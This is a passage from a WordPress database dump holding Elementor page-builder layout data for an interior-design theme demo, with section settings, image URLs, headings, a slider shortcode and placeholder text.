right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4019,4892,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4020,4892,'_elementor_pro_version','3.8.1'),(4021,4893,'_wp_page_template','elementor_header_footer'),(4022,4893,'_elementor_edit_mode','builder'),(4023,4893,'_elementor_template_type','wp-page'),(4024,4893,'_elementor_version','3.8.1'),(4025,4893,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_